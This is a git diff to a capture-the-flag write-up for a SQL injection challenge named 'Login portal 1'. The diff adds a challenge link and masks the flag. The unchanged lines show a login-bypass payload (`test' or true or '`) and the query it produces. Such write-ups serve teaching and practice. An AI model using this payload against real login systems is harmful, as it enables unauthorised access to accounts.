--- a/RingZer0Team/SQL-Injection/3.md
+++ b/RingZer0Team/SQL-Injection/3.md
@@ -1,5 +1,9 @@
 # Login portal 1
 
+## Description
+
+https://ringzer0team.com/challenges/3
+
 ## Solution
 
 By submitting `test'` we receive the following error message:
@@ -25,4 +29,4 @@ SELECT ... FROM ... WHERE username='test' or true or '' AND password=''
 |username|test' or true or '|
 |password|/* Any value, does not matter */|
 
-And we obtain the Flag `FLAG-4f885o1dal0q1huj6eaxuatcvn`
+And we obtain the Flag `FLAG-**************************`
